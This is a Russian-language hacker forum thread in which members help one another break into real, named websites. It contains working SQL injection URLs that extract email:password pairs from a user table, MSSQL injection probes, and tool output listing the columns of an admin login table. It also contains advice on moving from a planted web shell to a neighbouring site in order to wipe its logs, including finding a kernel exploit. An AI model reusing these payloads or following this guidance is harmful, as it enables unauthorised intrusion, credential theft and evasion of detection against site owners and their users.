Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    как?
     
  2. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    В мозиле: Вид - Кодировка и попробуй каждую
     
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а ну ладно, нужные мне данные в БД серовно на английском, они нормально отображаются
    тут я столкнулся с другой проблемой, мне надо вывести данные вида маил:пасс

    но я столкнулся с такой проблемой,
    при такой конструкции concat_ws(0x3a,email,password)
    выводит ошибку
    PHP:
    Illegal mix of collations (binary,COERCIBLE), (latin1_swedish_ci,IMPLICIT), (cp1251_general_ci,IMPLICIT) for operation 'concat_ws'
    как можно ещо попробовать вывести в нужном для меня виде?
     
  4. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    unhex(hex(concat_ws(0x3a,email,password)))
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    непомогло :(
     
  6. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Нужен линк, так сложно определить в чем проблема
     
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    PHP:
    http://motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+unhex(hex(concat_ws(0x3a,email,password)))+from+user+limit+1,1),floor(rand(0)*2))having+min(0)+or+1--+
     
  8. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Выводи пока так
    и так еще можно:
     
    #18708 er9j6@, 21 Dec 2011
    Last edited: 21 Dec 2011
    2 people like this.
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    о, спасибо, а чё ето за чудо конструкция??

    http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+

    где я могу почитать о том что ето (@x:=0x 00) и тп, означает?
     
  10. Napas

    Napas Member

    Joined:
    30 Nov 2008
    Messages:
    41
    Likes Received:
    12
    Reputations:
    7
    http://mysql.ru/docs/man/Variables.html
     
  11. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    вопрос технического характера, как отследить HTTPS запрос?
     
  12. DarkMaster

    DarkMaster New Member

    Joined:
    17 Apr 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Подскажите, здесь есть уязвимость, или только раскрытие путей:
    saturn.net/contacts.php?id=4%27

    уж больно пути странные пишет...
     
  13. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Подскажите... есть сайт, есть форма. Фильтр на иньекцию -


    Code:
    function is_secure($string)
    			{
    			
    			//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
    				$pattern = "#[^A-Za-z0-9]#";	
    				
    					if(@preg_match($pattern,$string)==true) return false;
    						else
    							return true;
    			}
    

    Если делаем так :

    Code:
    <input name="u" id="input" value="Username[]" type="text"  maxlength="12" /><br /><br />
    
    preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ?
     
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    нельзя
     
    _________________________
    1 person likes this.
  15. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Только раскрытие путей.
    Но имеются другие уязвимые параметры и они говорят, что стоит база MSSQL , например:
    http://saturn.net/news.php?id=430+order+by+datalength(@@version)+--+
    http://saturn.net/news.php?id=convert(int,db_name()+COLLATE+SQL_Latin1_General_Cp1254_CS_AS)+and+1=1
    а, дальше вбиваешь этот url в havij и раскручиваешь да таблицы с паролем от админки
    Count(name) of syscolumns Where id=(SELECT id FROM sysobjects WHERE name=char(119)%2bchar(95)%2bchar(83)%2bchar(105)%2bchar(116)%2bchar(101)%2bchar(85)%2bchar(115)%2bchar(101)%2bchar(114)) is 6
    Column found: FullName
    Column found: id
    Column found: isEnabled
    Column found: isSuperUser
    Column found: Login
    Column found: Password
     
  16. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    http://www.kupibt.ru/catalogue/ID_19467
    А эту как?
     
  17. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    А где ты тут скулю видишь?
     
  18. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    165
    Likes Received:
    9
    Reputations:
    6
    Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.
     
  19. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Смотри версию ядра и ищи сплоит :)
     
  20. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    http://forum.antichat.ru/thread296327.html
     
Thread Status:
Not open for further replies.